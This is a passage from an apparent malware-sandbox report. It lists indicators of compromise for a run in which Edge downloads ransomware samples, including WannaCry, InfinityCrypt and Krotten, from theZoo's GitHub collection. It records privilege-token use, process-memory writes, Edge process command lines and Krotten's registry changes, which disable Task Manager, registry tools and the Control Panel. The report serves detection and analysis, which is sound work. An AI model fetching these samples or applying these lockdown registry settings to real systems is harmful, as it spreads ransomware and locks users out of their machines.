Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND	Krotten.exe

NTFS ADS 10 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\robux.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 545732.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\free bobux.bat:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Krotten.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 855213.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 953131.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 830016.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\InfinityCrypt.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 228003.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3128	msedge.exe
3128	msedge.exe
4796	msedge.exe
4796	msedge.exe
5092	identity_helper.exe
5092	identity_helper.exe
2704	msedge.exe
2704	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4808	msedge.exe
4808	msedge.exe
1620	powershell.exe
1620	powershell.exe
4336	msedge.exe
4336	msedge.exe
2104	powershell.exe
2104	powershell.exe
2204	msedge.exe
2204	msedge.exe
1920	msedge.exe
1920	msedge.exe
4724	msedge.exe
4724	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 54 IoCs

pid	Process
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

description	pid	Process
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	3048	InfinityCrypt.exe
Token: SeDebugPrivilege	2064	InfinityCrypt.exe
Token: SeSystemtimePrivilege	2960	Krotten.exe
Token: SeSystemtimePrivilege	2960	Krotten.exe
Token: SeSystemtimePrivilege	2960	Krotten.exe
Token: SeDebugPrivilege	3792	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	112	taskkill.exe
Token: SeDebugPrivilege	3280	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3728	WMIC.exe
Token: SeSecurityPrivilege	3728	WMIC.exe
Token: SeTakeOwnershipPrivilege	3728	WMIC.exe
Token: SeLoadDriverPrivilege	3728	WMIC.exe
Token: SeSystemProfilePrivilege	3728	WMIC.exe
Token: SeSystemtimePrivilege	3728	WMIC.exe
Token: SeProfSingleProcessPrivilege	3728	WMIC.exe
Token: SeIncBasePriorityPrivilege	3728	WMIC.exe
Token: SeCreatePagefilePrivilege	3728	WMIC.exe
Token: SeBackupPrivilege	3728	WMIC.exe
Token: SeRestorePrivilege	3728	WMIC.exe
Token: SeShutdownPrivilege	3728	WMIC.exe
Token: SeDebugPrivilege	3728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3728	WMIC.exe
Token: SeRemoteShutdownPrivilege	3728	WMIC.exe
Token: SeUndockPrivilege	3728	WMIC.exe
Token: SeManageVolumePrivilege	3728	WMIC.exe
Token: 33	3728	WMIC.exe
Token: 34	3728	WMIC.exe
Token: 35	3728	WMIC.exe
Token: 36	3728	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3728	WMIC.exe
Token: SeSecurityPrivilege	3728	WMIC.exe
Token: SeTakeOwnershipPrivilege	3728	WMIC.exe
Token: SeLoadDriverPrivilege	3728	WMIC.exe
Token: SeSystemProfilePrivilege	3728	WMIC.exe
Token: SeSystemtimePrivilege	3728	WMIC.exe
Token: SeProfSingleProcessPrivilege	3728	WMIC.exe
Token: SeIncBasePriorityPrivilege	3728	WMIC.exe
Token: SeCreatePagefilePrivilege	3728	WMIC.exe
Token: SeBackupPrivilege	3728	WMIC.exe
Token: SeRestorePrivilege	3728	WMIC.exe
Token: SeShutdownPrivilege	3728	WMIC.exe
Token: SeDebugPrivilege	3728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3728	WMIC.exe
Token: SeRemoteShutdownPrivilege	3728	WMIC.exe
Token: SeUndockPrivilege	3728	WMIC.exe
Token: SeManageVolumePrivilege	3728	WMIC.exe
Token: 33	3728	WMIC.exe
Token: 34	3728	WMIC.exe
Token: 35	3728	WMIC.exe
Token: 36	3728	WMIC.exe
Token: SeBackupPrivilege	3888	vssvc.exe
Token: SeRestorePrivilege	3888	vssvc.exe
Token: SeAuditPrivilege	3888	vssvc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1700	!WannaDecryptor!.exe
1700	!WannaDecryptor!.exe
2028	!WannaDecryptor!.exe
2028	!WannaDecryptor!.exe
4008	!WannaDecryptor!.exe
4008	!WannaDecryptor!.exe
1508	!WannaDecryptor!.exe
1508	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 4328	4796	msedge.exe	77
PID 4796 wrote to memory of 4328	4796	msedge.exe	77
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 224	4796	msedge.exe	78
PID 4796 wrote to memory of 3128	4796	msedge.exe	79
PID 4796 wrote to memory of 3128	4796	msedge.exe	79
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80
PID 4796 wrote to memory of 448	4796	msedge.exe	80

System policy modification 1 TTPs 37 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1"	Krotten.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1"	Krotten.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall	Krotten.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1"	Krotten.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	Krotten.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1"	Krotten.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb9a463cb8,0x7ffb9a463cc8,0x7ffb9a463cd8
  2⤵
  PID:4328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1888 /prefetch:2
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
  2⤵
  PID:448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:2424
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3368 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:3544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
  2⤵
  PID:2160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1
  2⤵
  PID:1372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
  2⤵
  PID:1616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:4156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
  2⤵
  PID:1888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
  2⤵
  PID:3520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6443664309820741587,15727098386077634727,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
